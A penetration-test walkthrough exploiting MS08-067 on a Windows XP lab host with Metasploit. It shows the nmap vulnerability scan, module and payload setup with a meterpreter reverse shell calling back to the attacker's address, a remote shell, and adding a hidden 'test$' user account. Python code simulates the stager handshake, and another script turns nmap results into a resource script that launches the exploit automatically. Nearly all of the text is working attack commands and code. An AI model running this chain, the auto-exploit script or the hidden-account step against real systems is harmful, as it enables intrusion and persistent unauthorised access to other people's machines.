A real penetration test

A convenient way to check for a known vulnerability by hand is to run nmap with its NSE scripts from inside Metasploit: msfconsole passes an nmap command line straight through to the system nmap (db_nmap does the same and additionally stores the results in the Metasploit database).

root@bt:/opt/metasploit/msf3# msfconsole

msf > nmap -sT -A --script=smb-check-vulns -PO 172.16.21.170

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-11-19 14:58 CST
Nmap scan report for 172.16.21.170
Host is up (0.00035s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft ESMTP 6.0.2600.1
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1057/tcp open msrpc Microsoft Windows RPC
1058/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
MAC Address: 00:0C:29:9F:1E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Network Distance: 1 hop
Service Info: Host: lixiuli-vcs86vr; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-check-vulns:
| MS08-067: LIKELY VULNERABLE (host stopped responding)
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 172.16.21.170

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.88 seconds

Having seen "| MS08-067: LIKELY VULNERABLE (host stopped responding)", the next step is to look in Metasploit for an exploit module for this vulnerability. Be clear about what that result means: the MS08-067 test in smb-check-vulns is not a passive check, it triggers the bug, and "host stopped responding" records that the Server service stopped answering during the scan. That is consistent with the Conficker check timing out immediately afterwards, and it may be why the first exploit attempt further down fails with a pipe error. Run this check only against systems you are authorised to disrupt.

msf > search ms08_067   search the Metasploit framework for the ms08_067 netapi exploit module

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption

msf > use  exploit/windows/smb/ms08_067_netapi     load the module with the use command

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp      set the payload to the Windows meterpreter/reverse_tcp payload. After a successful exploit this payload makes the target host open a connection back to the IP address given in LHOST; because the connection is initiated from the target's side, it passes firewalls that only filter inbound traffic and works through NAT gateways
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets    most MSF exploit modules fingerprint the target system type automatically and do not need this parameter set by hand, but for MS08-067 automatic targeting often fails to identify the system correctly, so pick the target explicitly from the list

Exploit targets:

Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)
4 Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
6 Windows XP SP3 English (NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)

 

msf exploit(ms08_067_netapi) > set target 2    specify the target system type (2 = Windows XP SP0/SP1 Universal, matching the nmap OS detection above)
target => 2
msf exploit(ms08_067_netapi) > set rhost 172.16.21.170   the target address
rhost => 172.16.21.170
msf exploit(ms08_067_netapi) > set lhost 172.16.21.17    the attacker's IP address, which the payload connects back to
lhost => 172.16.21.17
msf exploit(ms08_067_netapi) > set lport 8080    the TCP port the attacker listens on
lport => 8080

msf exploit(ms08_067_netapi) > show options   check that all the options are set correctly

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.21.170 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 172.16.21.17 yes The listen address
LPORT 8080 yes The listen port


Exploit target:

Id Name
-- ----
2 Windows XP SP0/SP1 Universal


msf exploit(ms08_067_netapi) > exploit    launch the exploit

[*] Started reverse handler on 172.16.21.17:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.17:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.21.170
[*] Meterpreter session 1 opened (172.16.21.17:8080 -> 172.16.21.170:1039) at 2013-11-19 15:23:40 +0800
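The "Sending stage (752128 bytes)" line is the staged reverse_tcp handshake: the target's stager connects out to LHOST:LPORT, and the handler answers with a 4-byte little-endian length followed by the Meterpreter stage, which the stager reads and executes. The following is an added example in Python, not Metasploit's own code, that replays that exchange over loopback with a constructed stage of the same size; the function names and the 16 MiB sanity bound are the example's own assumptions.

```python
import socket
import struct
import threading

MAX_STAGE = 16 * 1024 * 1024   # sanity bound for this example only; a real stager trusts the length


def frame_stage(stage: bytes) -> bytes:
    """Handler side: length-prefix the stage (4-byte little-endian) before sending it."""
    return struct.pack("<I", len(stage)) + stage


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """recv() until exactly n bytes have arrived; TCP splits a 700 KB stage into many segments."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)


def read_stage(sock: socket.socket) -> bytes:
    """Target side: what the stager does once its outbound connection is up."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    if length == 0 or length > MAX_STAGE:
        raise ValueError(f"implausible stage length {length}")
    return recv_exact(sock, length)


def stage_exchange(stage: bytes, lhost: str = "127.0.0.1") -> bytes:
    """Run handler and target over loopback; return the stage the target received."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((lhost, 0))          # port 0 = ephemeral here; the real handler binds LPORT
    listener.listen(1)
    lport = listener.getsockname()[1]

    def handler():
        conn, _peer = listener.accept()
        with conn:
            conn.sendall(frame_stage(stage))

    t = threading.Thread(target=handler, daemon=True)
    t.start()
    # The target initiates the TCP connection, so inbound filtering and NAT on the
    # target's side never see a connection attempt arriving from outside.
    with socket.create_connection((lhost, lport), timeout=5) as target:
        target.settimeout(5)
        received = read_stage(target)
    t.join(5)
    listener.close()
    return received


if __name__ == "__main__":
    constructed_stage = bytes(range(256)) * 2938   # constructed: 752128 bytes, as in the session above
    got = stage_exchange(constructed_stage)
    print(f"stage received: {len(got)} bytes, intact={got == constructed_stage}")
```

The first four bytes the handler sends carry the stage size, 752128 in the session above, which is the number msfconsole prints; on the wire the stage itself follows immediately, unencrypted, which is what makes this stager easy to spot in a packet capture.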

 

The exploit command starts the reverse handler and attempts the exploit against the target. The first attempt failed with STATUS_PIPE_NOT_AVAILABLE, meaning the SMB named pipe the module uses (SMBPIPE, BROWSER here) could not be opened at that moment; a retry a little later succeeded. If the error persists, SMBPIPE SRVSVC is the other pipe the module offers. This attack succeeded: the second attempt delivered the Meterpreter stage and opened session 1.
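The whole procedure above, from reading the smb-check-vulns verdict to setting RHOST, LHOST, LPORT and TARGET and calling exploit, is mechanical enough to script. The following is an added example, not the original post's code: it parses the host-script block from nmap's normal output (SAMPLE is copied from the scan above), classifies each check, treating "host stopped responding" as a crash rather than a clean verdict, and emits a resource script for msfconsole -r that replays the module setup shown in the post. The function names, verdict labels and the default of TARGET 0 (Automatic Targeting) are the example's own assumptions.

```python
import re
import sys

# Constructed sample: the host-script block from the nmap run above.
SAMPLE = """\
Host script results:
| smb-check-vulns:
|   MS08-067: LIKELY VULNERABLE (host stopped responding)
|   Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
"""

LINE_RE = re.compile(r"^\|_?\s*(?P<name>[^:]+):\s*(?P<result>.+?)\s*$")


def parse_smb_check_vulns(text: str) -> dict:
    """Return {check name: raw result} for the smb-check-vulns block in nmap's normal output."""
    results = {}
    in_block = False
    for line in text.splitlines():
        if not in_block:
            in_block = "smb-check-vulns:" in line
            continue
        m = LINE_RE.match(line)
        if not m:
            break
        results[m.group("name").strip()] = m.group("result")
        if line.startswith("|_"):      # "|_" marks the last line of a script's output
            break
    return results


def classify(results: dict) -> dict:
    """Map each raw result to a verdict. Order matters: 'NOT VULNERABLE' contains 'VULNERABLE'."""
    verdicts = {}
    for name, raw in results.items():
        r = raw.upper()
        if "CHECK DISABLED" in r:
            v = "disabled"
        elif "NOT VULNERABLE" in r:
            v = "not_vulnerable"
        elif "HOST STOPPED RESPONDING" in r:
            # The check itself knocked the service over: very likely vulnerable,
            # but the scan has already caused an outage on the target.
            v = "crashed"
        elif "VULNERABLE" in r:
            v = "vulnerable"
        else:
            v = "unknown"
        verdicts[name] = v
    return verdicts


def build_msf_rc(rhost, lhost, lport=4444, target=0, smbpipe="BROWSER") -> str:
    """Resource script for 'msfconsole -r', mirroring the commands typed in the post."""
    lines = [
        "use exploit/windows/smb/ms08_067_netapi",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set RHOST {rhost}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        f"set SMBPIPE {smbpipe}",
        f"set TARGET {target}",
        "exploit -j",
    ]
    return "\n".join(lines) + "\n"


def plan(results: dict, rhost, lhost, lport=4444, target=0):
    """Return the resource script only when MS08-067 looks exploitable, else None."""
    if classify(results).get("MS08-067") not in ("vulnerable", "crashed"):
        return None
    return build_msf_rc(rhost, lhost, lport, target)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    found = parse_smb_check_vulns(text)
    for name, verdict in classify(found).items():
        print(f"{name:28s} {verdict:15s} {found[name]}")
    rc = plan(found, rhost="172.16.21.170", lhost="172.16.21.17", lport=8080, target=2)
    if rc:
        with open("ms08_067.rc", "w") as fh:
            fh.write(rc)
        print("wrote ms08_067.rc; run: msfconsole -q -r ms08_067.rc")
```

Save the normal nmap output to a file and pass it as the first argument; a "crashed" verdict is the cue to wait for the Server service to come back before running the resource script, which is the situation the first failed exploit attempt above illustrates.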

meterpreter > pwd
C:\WINDOWS\system32

meterpreter > shell

Process 732 created.
Channel 1 created.
Microsoft Windows XP [ 5.1.2600]
(C) 1985-2001 Microsoft Corp.

C:\windows>net user test$ 123456 /add

Now go and look on the attacked machine (.170). The trailing $ in test$ is the usual trick for a "hidden" account: net user leaves names ending in $ out of its listing, but the account is still visible in Local Users and Groups and in the SAM, so it is only hidden from someone who does not look.
